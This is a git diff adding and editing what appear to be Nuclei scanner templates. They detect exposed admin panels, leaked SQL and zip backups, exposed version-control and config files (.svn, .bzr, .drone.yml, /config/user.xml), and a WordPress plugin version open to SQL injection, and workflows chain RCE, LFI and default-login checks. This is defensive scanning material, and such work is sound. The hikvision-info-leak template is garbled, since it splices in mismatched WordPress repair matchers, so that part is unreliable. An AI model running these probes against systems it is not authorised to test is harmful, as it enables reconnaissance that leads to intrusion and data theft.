+ path:
+ - "{{BaseURL}}/web/database/selector/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Odoo'
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/servicedesk-login-panel.yaml b/exposed-panels/servicedesk-login-panel.yaml
new file mode 100644
index 0000000000..fa86dad366
--- /dev/null
+++ b/exposed-panels/servicedesk-login-panel.yaml
@@ -0,0 +1,23 @@
+id: servicedesk-login-panel
+
+info:
+ name: Servicedesk Login Panel Detector
+ author: aashiq
+ severity: info
+ description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint
+ tags: servicedesk,confluence,jira,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/servicedesk/customer/user/login"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "https://confluence.atlassian.com"
diff --git a/exposed-panels/synnefo-admin-panel.yaml b/exposed-panels/synnefo-admin-panel.yaml
new file mode 100644
index 0000000000..9a79f3b8da
--- /dev/null
+++ b/exposed-panels/synnefo-admin-panel.yaml
@@ -0,0 +1,22 @@
+id: synnefo-admin-panel
+
+info:
+ name: Synnefo Admin Panel Exposure
+ author: impramodsargar
+ severity: info
+ tags: panel,synnefo
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/synnefoclient/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Synnefo Admin'
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/zenario-login-panel.yaml b/exposed-panels/zenario-login-panel.yaml
new file mode 100644
index 0000000000..817bcf573f
--- /dev/null
+++ b/exposed-panels/zenario-login-panel.yaml
@@ -0,0 +1,22 @@
+id: zenario-login-panel
+
+info:
+ name: Zenario Admin login
+ author: __Fazal
+ severity: info
+ tags: panel,zenario
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/zenario/admin/welcome.php'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Welcome to Zenario"
diff --git a/exposures/backups/sql-dump.yaml b/exposures/backups/sql-dump.yaml
index d6a967bb24..ed7bb21c67 100644
--- a/exposures/backups/sql-dump.yaml
+++ b/exposures/backups/sql-dump.yaml
@@ -30,12 +30,15 @@ requests:
- "{{BaseURL}}/wp-content/uploads/dump.sql"
headers:
Range: "bytes=0-3000"
+
+ max-size: 2000 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
- type: regex
regex:
- "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO"
part: body
+
- type: status
status:
- 200
diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml
index 3a768423d0..6feee72a8e 100644
--- a/exposures/backups/zip-backup-files.yaml
+++ b/exposures/backups/zip-backup-files.yaml
@@ -32,6 +32,8 @@ requests:
- "{{BaseURL}}/{{Hostname}}.sql.zip"
- "{{BaseURL}}/{{Hostname}}.sql.z"
- "{{BaseURL}}/{{Hostname}}.sql.tar.z"
+
+ max-size: 500 # Size in bytes - Max Size to read from server response
matchers-condition: and
matchers:
- type: binary
@@ -49,10 +51,12 @@ requests:
- "504B0304" # zip
condition: or
part: body
+
- type: regex
regex:
- "application/[-\\w.]+"
part: header
+
- type: status
status:
- 200
diff --git a/exposures/configs/airflow-configuration-exposure.yaml b/exposures/configs/airflow-configuration-exposure.yaml
index cf59dd669c..a715bba8ac 100644
--- a/exposures/configs/airflow-configuration-exposure.yaml
+++ b/exposures/configs/airflow-configuration-exposure.yaml
@@ -4,7 +4,7 @@ info:
name: Apache Airflow Configuration Exposure
author: pdteam
severity: medium
- tags: exposure,config
+ tags: exposure,config,airflow,apache
requests:
- method: GET
diff --git a/exposures/configs/detect-drone-config.yaml b/exposures/configs/detect-drone-config.yaml
new file mode 100644
index 0000000000..01384c4d0a
--- /dev/null
+++ b/exposures/configs/detect-drone-config.yaml
@@ -0,0 +1,25 @@
+id: detect-drone-config
+
+info:
+ name: Detect Drone Configuration
+ author: geeknik
+ description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone
+ severity: high
+ tags: config,exposure,drone
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.drone.yml"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "kind:"
+ - "name:"
+ - "steps:"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/exposures/configs/exposed-bzr.yaml b/exposures/configs/exposed-bzr.yaml
index 5f00619d9e..c90b3457cd 100644
--- a/exposures/configs/exposed-bzr.yaml
+++ b/exposures/configs/exposed-bzr.yaml
@@ -18,8 +18,13 @@ requests:
words:
- "parent_location"
- "push_location"
- condition: and
+ condition: or
- type: status
status:
- 200
+
+ - type: word
+ part: header
+ words:
+ - "text/plain"
\ No newline at end of file
diff --git a/exposures/configs/exposed-svn.yaml b/exposures/configs/exposed-svn.yaml
index b88ce042e1..7be0564837 100644
--- a/exposures/configs/exposed-svn.yaml
+++ b/exposures/configs/exposed-svn.yaml
@@ -4,14 +4,12 @@ info:
name: Exposed SVN Directory
author: udit_thakkur & dwisiswant0
severity: medium
- tags: config,exposure
+ tags: config,exposure,svn
requests:
- method: GET
path:
- "{{BaseURL}}/.svn/entries"
- - "{{BaseURL}}/.svn/prop-base/"
- - "{{BaseURL}}/.svn/text-base/"
matchers-condition: and
matchers:
@@ -19,10 +17,12 @@ requests:
part: body
regex:
- "(^10\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))"
+
- type: status
status:
- 200
- - type: dsl
- dsl:
- - 'contains(tolower(body), "") == false'
\ No newline at end of file
+ - type: word
+ part: header
+ words:
+ - "text/plain"
\ No newline at end of file
diff --git a/exposures/configs/exposed-vscode.yaml b/exposures/configs/exposed-vscode.yaml
new file mode 100644
index 0000000000..6bc6c6661d
--- /dev/null
+++ b/exposures/configs/exposed-vscode.yaml
@@ -0,0 +1,18 @@
+id: exposed-vscode
+
+info:
+ name: Exposed VSCode Folders
+ author: aashiq
+ severity: low
+ description: Searches for exposed Visual Studio Code Directories by querying the /.vscode endpoint and existence of "index of" in the body
+ tags: vscode,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.vscode/"
+ matchers:
+ - type: word
+ words:
+ - "Index of /.vscode"
+ part: body
\ No newline at end of file
diff --git a/exposures/configs/hikvision-info-leak.yaml b/exposures/configs/hikvision-info-leak.yaml
new file mode 100644
index 0000000000..c9c6095b67
--- /dev/null
+++ b/exposures/configs/hikvision-info-leak.yaml
@@ -0,0 +1,25 @@
+id: hikvision-info-leak
+
+info:
+ name: Hikvision Info Leak
+ author: pikpikcu
+ severity: medium
+ tags: exposure,config
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/config/user.xml'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'WordPress"
+
+ - type: word
+ words:
+ - "define('WP_ALLOW_REPAIR', true);"
+ negative: true
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml b/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml
new file mode 100644
index 0000000000..1869a7386f
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml
@@ -0,0 +1,28 @@
+id: wp-mailchimp-log-exposure
+
+info:
+ name: WordPress Mailchimp 4 Debug Log Exposure
+ author: aashiq
+ severity: medium
+ description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content
+ tags: logs,wordpress,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "WARNING: Form"
+
+ - type: word
+ words:
+ - 'text/plain'
+ part: header
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml b/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml
new file mode 100644
index 0000000000..da683968f2
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml
@@ -0,0 +1,33 @@
+id: wp-plugin-statistics-sqli
+
+info:
+ name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection
+ author: lotusdll
+ severity: critical
+ description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability.
+ reference: |
+ - https://www.exploit-db.com/exploits/49894
+ - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
+ - https://github.com/Udyz/WP-Statistics-BlindSQL
+ tags: wordpress,wp-plugin,unauth,sqli,blind
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "WP Statistics"
+ part: body
+
+ - type: regex
+ regex:
+ - 'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]$'
+ part: body
diff --git a/vulnerabilities/wordpress/wp-popup-listing.yaml b/vulnerabilities/wordpress/wp-popup-listing.yaml
new file mode 100644
index 0000000000..e8ea453ee8
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-popup-listing.yaml
@@ -0,0 +1,25 @@
+id: wordpress-popup-listing
+
+info:
+ name: WordPress Popup Plugin Directory Listing
+ author: aashiq
+ severity: info
+ description: Searches for sensitive directories present in the wordpress-popup plugin.
+ tags: wordpress,listing
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Index of"
+ - "/wp-content/plugins/wordpress-popup/views/admin"
+ condition: and
diff --git a/vulnerabilities/wordpress/wp-uploads-listing.yaml b/vulnerabilities/wordpress/wp-uploads-listing.yaml
deleted file mode 100644
index 86af016597..0000000000
--- a/vulnerabilities/wordpress/wp-uploads-listing.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: wp-uploads-listing
-
-info:
- name: WordPress Upload Directory Listing Enable
- author: yashgoti
- severity: info
- tags: wordpress
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/uploads/"
- - "{{BaseURL}}/wp-content/uploads/2015/"
- - "{{BaseURL}}/wp-content/uploads/2016/"
- - "{{BaseURL}}/wp-content/uploads/2017/"
- - "{{BaseURL}}/wp-content/uploads/2018/"
- - "{{BaseURL}}/wp-content/uploads/2019/"
- - "{{BaseURL}}/wp-content/uploads/2020/"
- - "{{BaseURL}}/wp-content/uploads/2021/"
- - "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Directory listing for"
- - "Index of /"
- - "[To Parent Directory]"
- - "Directory: /"
-
- - type: status
- status:
- - 200
diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml
new file mode 100644
index 0000000000..8a5a9164e8
--- /dev/null
+++ b/workflows/airflow-workflow.yaml
@@ -0,0 +1,18 @@
+id: airflow-workflow
+
+info:
+ name: Apache Airflow Security Checks
+ author: pdteam
+ description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target.
+ tags: workflow
+
+workflows:
+
+ - template: technologies/airflow-detect.yaml
+ subtemplates:
+ - template: cves/2020/CVE-2020-11978.yaml
+ - template: cves/2020/CVE-2020-13927.yaml
+ - template: exposed-panels/airflow-panel.yaml
+ - template: exposures/configs/airflow-configuration-exposure.yaml
+ - template: default-logins/apache/airflow-default-credentials.yaml
+ - template: misconfiguration/airflow/
\ No newline at end of file
diff --git a/workflows/ruijie-workflow.yaml b/workflows/ruijie-workflow.yaml
index 5ba69854c5..086cd7d125 100644
--- a/workflows/ruijie-workflow.yaml
+++ b/workflows/ruijie-workflow.yaml
@@ -6,9 +6,9 @@ info:
description: A simple workflow that runs all Ruijie related nuclei templates on a given target.
workflows:
- - template: default-logins/smartweb/ruijie-smartweb-default-password.yaml
+ - template: cnvd/CNVD-2021-17369.yaml
- template: vulnerabilities/other/ruijie-networks-lfi.yaml
- template: vulnerabilities/other/ruijie-networks-rce.yaml
- template: exposures/configs/ruijie-information-disclosure.yaml
- - template: exposures/configs/ruijie-smartweb-disclosure.yaml
+ - template: cnvd/CNVD-2020-56167.yaml
- template: exposures/configs/ruijie-phpinfo.yaml
diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml
index d94b0ef9da..09d2866f30 100644
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@@ -32,4 +32,5 @@ workflows:
- template: cves/2020/CVE-2020-35489.yaml
- template: cves/2021/CVE-2021-24146.yaml
- template: cves/2021/CVE-2021-24176.yaml
+ - template: cves/2021/CVE-2021-24316.yaml
- template: vulnerabilities/wordpress/
\ No newline at end of file